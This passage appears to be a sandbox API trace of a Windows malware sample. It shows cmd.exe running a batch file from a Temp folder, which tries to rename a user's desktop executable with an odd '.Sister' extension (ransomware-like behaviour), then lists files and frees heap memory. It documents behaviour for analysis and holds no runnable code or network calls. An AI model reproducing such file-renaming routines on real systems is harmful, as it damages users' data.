hFindFile=0x21ed8d65e90) returned 1 [0306.467] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d66310 [0306.467] FindClose (in: hFindFile=0x21ed8d66310 | out: hFindFile=0x21ed8d66310) returned 1 [0306.467] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d659b0 [0306.467] FindClose (in: hFindFile=0x21ed8d659b0 | out: hFindFile=0x21ed8d659b0) returned 1 [0306.468] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0306.468] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.468] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0306.468] GetProcessHeap () returned 0x21ed8c70000 [0306.468] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d37e50 [0306.468] ??_V@YAXPEAX@Z () returned 0x1 [0306.468] ??_V@YAXPEAX@Z () returned 0x1 [0306.468] GetProcessHeap () returned 0x21ed8c70000 [0306.468] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3ae50, Size=0x490) returned 0x21ed8d3ae50 [0306.468] GetProcessHeap () returned 0x21ed8c70000 [0306.468] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3ae50) returned 0x490 [0306.468] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0306.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.469] GetFileType (hFile=0x50) returned 0x2 [0306.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.469] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0306.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.470] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0306.476] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.477] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.477] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0306.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.477] GetFileType (hFile=0x50) returned 0x2 [0306.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.477] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0306.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.477] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0306.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.478] GetFileType (hFile=0x50) returned 0x2 [0306.478] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.478] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0306.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.479] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d3ae20*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d3ae20*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0306.479] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0306.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.479] GetFileType (hFile=0x50) returned 0x2 [0306.479] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.479] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0306.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.480] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0306.490] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0306.490] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.490] GetFileType (hFile=0x50) returned 0x2 [0306.490] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.490] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0306.491] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.491] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0306.498] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.498] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.499] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.499] malloc (_Size=0xffce) returned 0x21eda39fac0 [0306.499] ??_V@YAXPEAX@Z () returned 0x21eda39fac0 [0306.499] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0306.499] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0306.499] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0306.499] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0306.499] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0306.499] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0306.499] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0306.499] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0306.499] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0306.499] ??_V@YAXPEAX@Z () returned 0x1 [0306.499] GetProcessHeap () returned 0x21ed8c70000 [0306.499] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d600a0 [0306.500] GetProcessHeap () returned 0x21ed8c70000 [0306.500] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d600a0, Size=0x130) returned 0x21ed93b3d00 [0306.500] GetProcessHeap () returned 0x21ed8c70000 [0306.500] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b3d00) returned 0x130 [0306.500] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.500] malloc (_Size=0xffce) returned 0x21eda39fac0 [0306.500] ??_V@YAXPEAX@Z () returned 0x21eda39fac0 [0306.500] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.500] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda39fac0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0306.502] ??_V@YAXPEAX@Z () returned 0x1 [0306.502] GetProcessHeap () returned 0x21ed8c70000 [0306.502] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed93b3580 [0306.502] GetProcessHeap () returned 0x21ed8c70000 [0306.502] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e680 [0306.502] GetProcessHeap () returned 0x21ed8c70000 [0306.502] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e680, Size=0x130) returned 0x21ed93b3e40 [0306.502] GetProcessHeap () returned 0x21ed8c70000 [0306.503] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b3e40) returned 0x130 [0306.503] malloc (_Size=0xffce) returned 0x21eda39fac0 [0306.503] ??_V@YAXPEAX@Z () returned 0x21eda39fac0 [0306.503] GetProcessHeap () returned 0x21ed8c70000 [0306.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65e90 [0306.503] GetProcessHeap () returned 0x21ed8c70000 [0306.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed948aea0 [0306.503] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0306.503] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0306.503] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.503] GetLastError () returned 0x2 [0306.503] GetProcessHeap () returned 0x21ed8c70000 [0306.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94cbd60 [0306.504] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed94cbd70 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.504] SetErrorMode (uMode=0x0) returned 0x0 [0306.504] SetErrorMode (uMode=0x1) returned 0x0 [0306.504] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda39fac0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0306.504] SetErrorMode (uMode=0x0) returned 0x1 [0306.504] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0306.504] GetProcessHeap () returned 0x21ed8c70000 [0306.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9489160 [0306.504] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0306.504] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0306.504] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.505] GetLastError () returned 0x2 [0306.505] ??_V@YAXPEAX@Z () returned 0x1 [0306.505] malloc (_Size=0xffce) returned 0x21eda39fac0 [0306.505] ??_V@YAXPEAX@Z () returned 0x21eda39fac0 [0306.505] malloc (_Size=0xffce) returned 0x21eda3afaa0 [0306.505] ??_V@YAXPEAX@Z () returned 0x21eda3afaa0 [0306.505] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.505] GetLastError () returned 0x2 [0306.505] _get_osfhandle (_FileHandle=2) returned 0x54 [0306.505] GetFileType (hFile=0x54) returned 0x2 [0306.505] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0306.505] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0306.506] _get_osfhandle (_FileHandle=2) returned 0x54 [0306.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0306.506] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0306.507] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0306.507] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0306.513] longjmp () [0306.513] ??_V@YAXPEAX@Z () returned 0x1 [0306.513] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1229ac0, ftCreationTime.dwHighDateTime=0x1d5e704, ftLastAccessTime.dwLowDateTime=0xf2fedd00, ftLastAccessTime.dwHighDateTime=0x1d5ee24, ftLastWriteTime.dwLowDateTime=0xf2fedd00, ftLastWriteTime.dwHighDateTime=0x1d5ee24, nFileSizeHigh=0x0, nFileSizeLow=0x10174, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="_s7nB1B.pps", cAlternateFileName="")) returned 0 [0306.513] GetLastError () returned 0x12 [0306.513] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0306.513] GetProcessHeap () returned 0x21ed8c70000 [0306.514] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95b80) returned 1 [0306.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.514] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0306.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.514] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0306.514] _get_osfhandle (_FileHandle=0) returned 0x4c [0306.514] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0306.515] SetConsoleInputExeNameW () returned 0x1 [0306.515] GetConsoleOutputCP () returned 0x1b5 [0306.515] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0306.515] SetThreadUILanguage (LangId=0x0) returned 0x409 [0306.516] ??_V@YAXPEAX@Z () returned 0x1 [0306.516] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0306.516] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0306.516] _get_osfhandle (_FileHandle=3) returned 0x3c [0306.516] SetFilePointer (in: hFile=0x3c, lDistanceToMove=892, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x37c [0306.516] GetProcessHeap () returned 0x21ed8c70000 [0306.516] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9489160) returned 1 [0306.516] GetProcessHeap () returned 0x21ed8c70000 [0306.516] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed94cbd60) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed948aea0) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65e90) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b3e40) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b3580) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b3d00) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d37e50) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9374af0) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9376530) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375270) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3ae50) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3ae10) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.517] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93753f0) returned 1 [0306.517] GetProcessHeap () returned 0x21ed8c70000 [0306.518] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66250) returned 1 [0306.518] GetProcessHeap () returned 0x21ed8c70000 [0306.518] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed948ac30) returned 1 [0306.518] GetProcessHeap () returned 0x21ed8c70000 [0306.518] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed94bbd70) returned 1 [0306.518] GetProcessHeap () returned 0x21ed8c70000 [0306.518] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed948a9c0) returned 1 [0306.518] GetProcessHeap () returned 0x21ed8c70000 [0306.518] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65f50) returned 1 [0306.518] GetProcessHeap () returned 0x21ed8c70000 [0306.518] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65a70) returned 1 [0306.518] GetProcessHeap () returned 0x21ed8c70000 [0306.518] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d63cb0) returned 1 [0306.518] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65e30) returned 1 [0306.519] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bf0) returned 1 [0306.519] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45b30) returned 1 [0306.519] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3acd0) returned 1 [0306.519] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3ac90) returned 1 [0306.519] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3a9f0) returned 1 [0306.519] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bc0) returned 1 [0306.519] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3a8b0) returned 1 [0306.519] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3a870) returned 1 [0306.519] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed94893d0) returned 1 [0306.519] GetProcessHeap () returned 0x21ed8c70000 [0306.519] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed94abd80) returned 1 [0306.521] GetProcessHeap () returned 0x21ed8c70000 [0306.521] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed948b110) returned 1 [0306.521] GetProcessHeap () returned 0x21ed8c70000 [0306.521] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66010) returned 1 [0306.521] GetProcessHeap () returned 0x21ed8c70000 [0306.521] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b3440) returned 1 [0306.522] GetProcessHeap () returned 0x21ed8c70000 [0306.522] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2d090) returned 1 [0306.522] GetProcessHeap () returned 0x21ed8c70000 [0306.522] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2ccd0) returned 1 [0306.522] GetProcessHeap () returned 0x21ed8c70000 [0306.522] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d382d0) returned 1 [0306.522] GetProcessHeap () returned 0x21ed8c70000 [0306.522] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375570) returned 1 [0306.522] GetProcessHeap () returned 0x21ed8c70000 [0306.522] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9376470) returned 1 [0306.522] GetProcessHeap () returned 0x21ed8c70000 [0306.522] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9375c30) returned 1 [0306.522] GetProcessHeap () returned 0x21ed8c70000 [0306.522] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3a3d0) returned 1 [0306.522] GetProcessHeap () returned 0x21ed8c70000 [0306.523] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3a390) returned 1 [0306.523] GetProcessHeap () returned 0x21ed8c70000 [0306.523] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93763b0) returned 1 [0306.523] GetProcessHeap () returned 0x21ed8c70000 [0306.523] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65b90) returned 1 [0306.523] GetProcessHeap () returned 0x21ed8c70000 [0306.523] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed948a750) returned 1 [0306.523] GetProcessHeap () returned 0x21ed8c70000 [0306.523] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed949bd90) returned 1 [0306.524] GetProcessHeap () returned 0x21ed8c70000 [0306.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed948b380) returned 1 [0306.524] GetProcessHeap () returned 0x21ed8c70000 [0306.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65d10) returned 1 [0306.524] GetProcessHeap () returned 0x21ed8c70000 [0306.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9378b60) returned 1 [0306.524] GetProcessHeap () returned 0x21ed8c70000 [0306.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44ae0) returned 1 [0306.524] GetProcessHeap () returned 0x21ed8c70000 [0306.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9378ac0) returned 1 [0306.524] GetProcessHeap () returned 0x21ed8c70000 [0306.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8a90) returned 1 [0306.524] GetProcessHeap () returned 0x21ed8c70000 [0306.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ba80) returned 1 [0306.524] GetProcessHeap () returned 0x21ed8c70000 [0306.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3a190) returned 1 [0306.524] GetProcessHeap () returned 0x21ed8c70000 [0306.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d3a150) returned 1 [0306.524] GetProcessHeap () returned 0x21ed8c70000 